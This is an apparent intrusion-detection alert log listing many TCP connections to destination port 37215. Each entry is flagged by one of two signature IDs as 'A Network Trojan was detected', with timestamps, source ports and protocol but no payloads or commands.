          Timestamp:06/09/24-16:33:26.987456
          SID:2829579
          Source Port:60656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.038580
          SID:2829579
          Source Port:40996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166485
          SID:2829579
          Source Port:37748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205520
          SID:2835222
          Source Port:48730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821753
          SID:2829579
          Source Port:33922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.597032
          SID:2835222
          Source Port:48110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230044
          SID:2829579
          Source Port:49454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716266
          SID:2829579
          Source Port:43102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818988
          SID:2829579
          Source Port:45212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.562154
          SID:2835222
          Source Port:55328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869760
          SID:2829579
          Source Port:55604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.245940
          SID:2835222
          Source Port:58752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248818
          SID:2829579
          Source Port:38552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478630
          SID:2835222
          Source Port:53606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.268378
          SID:2829579
          Source Port:44544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286802
          SID:2829579
          Source Port:51394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863232
          SID:2835222
          Source Port:43654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715763
          SID:2835222
          Source Port:48990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157302
          SID:2829579
          Source Port:34780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721206
          SID:2829579
          Source Port:41314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.919065
          SID:2829579
          Source Port:48912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.894625
          SID:2835222
          Source Port:49120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.395826
          SID:2829579
          Source Port:54910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397196
          SID:2835222
          Source Port:37382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822387
          SID:2829579
          Source Port:40912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247352
          SID:2829579
          Source Port:58308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.418370
          SID:2829579
          Source Port:53422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399461
          SID:2829579
          Source Port:46944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.860340
          SID:2835222
          Source Port:36062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930143
          SID:2829579
          Source Port:59572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.691903
          SID:2835222
          Source Port:39808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080974
          SID:2829579
          Source Port:36094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205650
          SID:2835222
          Source Port:52072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.692063
          SID:2835222
          Source Port:58870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169527
          SID:2835222
          Source Port:47938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.272016
          SID:2829579
          Source Port:50626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077629
          SID:2829579
          Source Port:34724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157144
          SID:2829579
          Source Port:43346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.712937
          SID:2835222
          Source Port:33432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415984
          SID:2829579
          Source Port:46172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986372
          SID:2829579
          Source Port:48752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165386
          SID:2829579
          Source Port:43842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081121
          SID:2835222
          Source Port:51782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080686
          SID:2829579
          Source Port:52822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715609
          SID:2829579
          Source Port:32820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.043120
          SID:2829579
          Source Port:35392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287187
          SID:2835222
          Source Port:59500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558066
          SID:2829579
          Source Port:58198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.288660
          SID:2835222
          Source Port:56726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645954
          SID:2829579
          Source Port:59222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.297585
          SID:2835222
          Source Port:60026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.222544
          SID:2835222
          Source Port:36986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248801
          SID:2835222
          Source Port:34554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867658
          SID:2835222
          Source Port:52812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929901
          SID:2835222
          Source Port:46570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538832
          SID:2835222
          Source Port:57800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863705
          SID:2829579
          Source Port:35946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397102
          SID:2829579
          Source Port:49770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.918041
          SID:2829579
          Source Port:56598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.283693
          SID:2829579
          Source Port:53566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.467010
          SID:2835222
          Source Port:33630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563429
          SID:2829579
          Source Port:50902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.017902
          SID:2829579
          Source Port:37948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719442
          SID:2835222
          Source Port:43224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.251265
          SID:2829579
          Source Port:36122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.467789
          SID:2835222
          Source Port:57852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567521
          SID:2829579
          Source Port:43564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414784
          SID:2835222
          Source Port:58038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244911
          SID:2829579
          Source Port:55010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.120636
          SID:2835222
          Source Port:57984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869742
          SID:2829579
          Source Port:57458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396178
          SID:2829579
          Source Port:36032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947354
          SID:2829579
          Source Port:37566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.676355
          SID:2829579
          Source Port:46950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165719
          SID:2835222
          Source Port:50422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719620
          SID:2829579
          Source Port:34206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539233
          SID:2829579
          Source Port:57624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.922188
          SID:2829579
          Source Port:50394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.717904
          SID:2829579
          Source Port:36938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.008083
          SID:2829579
          Source Port:50446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.272923
          SID:2835222
          Source Port:54818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539180
          SID:2835222
          Source Port:33836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948069
          SID:2829579
          Source Port:52292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.541453
          SID:2835222
          Source Port:60082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247268
          SID:2829579
          Source Port:36520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945931
          SID:2835222
          Source Port:41010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948248
          SID:2835222
          Source Port:40548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.075747
          SID:2829579
          Source Port:56064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645478
          SID:2835222
          Source Port:51240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.464751
          SID:2835222
          Source Port:47076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944333
          SID:2829579
          Source Port:35256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164918
          SID:2835222
          Source Port:57666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559801
          SID:2829579
          Source Port:57782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469480
          SID:2829579
          Source Port:53042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466215
          SID:2829579
          Source Port:60514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865982
          SID:2835222
          Source Port:59956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162199
          SID:2829579
          Source Port:55510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.411950
          SID:2835222
          Source Port:53518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285515
          SID:2829579
          Source Port:58724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600558
          SID:2829579
          Source Port:37384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226994
          SID:2835222
          Source Port:40580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539890
          SID:2829579
          Source Port:41374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169241
          SID:2835222
          Source Port:54690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596867
          SID:2835222
          Source Port:38576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.123314
          SID:2829579
          Source Port:51364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.158402
          SID:2835222
          Source Port:53654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.471731
          SID:2829579
          Source Port:41058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417988
          SID:2829579
          Source Port:47752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863933
          SID:2829579
          Source Port:41118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035872
          SID:2829579
          Source Port:59494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246707
          SID:2829579
          Source Port:33862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038044
          SID:2829579
          Source Port:36718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.300759
          SID:2835222
          Source Port:43724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646146
          SID:2835222
          Source Port:57192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.012612
          SID:2835222
          Source Port:38426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292297
          SID:2829579
          Source Port:48764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472217
          SID:2829579
          Source Port:55448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205252
          SID:2829579
          Source Port:45374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.693869
          SID:2835222
          Source Port:42568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166222
          SID:2835222
          Source Port:53844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929328
          SID:2835222
          Source Port:35466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.996366
          SID:2829579
          Source Port:57914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.296710
          SID:2835222
          Source Port:51114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.010564
          SID:2829579
          Source Port:32810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644434
          SID:2829579
          Source Port:46872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077186
          SID:2835222
          Source Port:59998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.078269
          SID:2835222
          Source Port:32858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.995695
          SID:2829579
          Source Port:53036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080877
          SID:2829579
          Source Port:51602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539852
          SID:2829579
          Source Port:35424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.687368
          SID:2829579
          Source Port:44472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822948
          SID:2835222
          Source Port:45146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.307351
          SID:2829579
          Source Port:57790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721287
          SID:2829579
          Source Port:42932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.608002
          SID:2835222
          Source Port:47956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412919
          SID:2835222
          Source Port:39684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923179
          SID:2835222
          Source Port:38954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224178
          SID:2829579
          Source Port:55678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.464671
          SID:2835222
          Source Port:41996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414304
          SID:2835222
          Source Port:51490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865017
          SID:2829579
          Source Port:58224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249634
          SID:2835222
          Source Port:60186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466097
          SID:2835222
          Source Port:33670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.565084
          SID:2829579
          Source Port:47262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989605
          SID:2829579
          Source Port:32990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822004
          SID:2829579
          Source Port:46814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250676
          SID:2829579
          Source Port:45928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413671
          SID:2829579
          Source Port:59140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990894
          SID:2835222
          Source Port:37628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929151
          SID:2829579
          Source Port:60824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102456
          SID:2835222
          Source Port:53170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.595122
          SID:2835222
          Source Port:52726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718777
          SID:2835222
          Source Port:39176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947955
          SID:2835222
          Source Port:37200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077644
          SID:2829579
          Source Port:38736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225212
          SID:2829579
          Source Port:50738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923806
          SID:2835222
          Source Port:50942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159274
          SID:2829579
          Source Port:48988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643741
          SID:2835222
          Source Port:54924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.952086
          SID:2829579
          Source Port:52168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915909
          SID:2835222
          Source Port:38144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721704
          SID:2835222
          Source Port:38574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.289158
          SID:2829579
          Source Port:54622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223835
          SID:2835222
          Source Port:54648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.490171
          SID:2835222
          Source Port:60662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.033909
          SID:2829579
          Source Port:42160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034754
          SID:2829579
          Source Port:48564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923636
          SID:2829579
          Source Port:40572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414901
          SID:2835222
          Source Port:49204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466150
          SID:2829579
          Source Port:35768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929219
          SID:2829579
          Source Port:45404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034619
          SID:2835222
          Source Port:45656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.100991
          SID:2835222
          Source Port:47212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719564
          SID:2835222
          Source Port:57684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284901
          SID:2835222
          Source Port:56290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914396
          SID:2829579
          Source Port:37276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289132
          SID:2829579
          Source Port:56812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230299
          SID:2829579
          Source Port:59054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559703
          SID:2835222
          Source Port:46134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471468
          SID:2835222
          Source Port:40806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646146
          SID:2829579
          Source Port:54896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820169
          SID:2835222
          Source Port:51100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.155884
          SID:2835222
          Source Port:37694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.290268
          SID:2829579
          Source Port:57858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471166
          SID:2835222
          Source Port:55374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029709
          SID:2835222
          Source Port:42002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417944
          SID:2835222
          Source Port:49922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080994
          SID:2835222
          Source Port:39766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.067334
          SID:2829579
          Source Port:39394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.922929
          SID:2835222
          Source Port:39332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415496
          SID:2829579
          Source Port:39714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077090
          SID:2829579
          Source Port:52652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.080702
          SID:2835222
          Source Port:55086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034537
          SID:2829579
          Source Port:52136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.633845
          SID:2835222
          Source Port:53286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418785
          SID:2835222
          Source Port:36330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284881
          SID:2829579
          Source Port:46180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990780
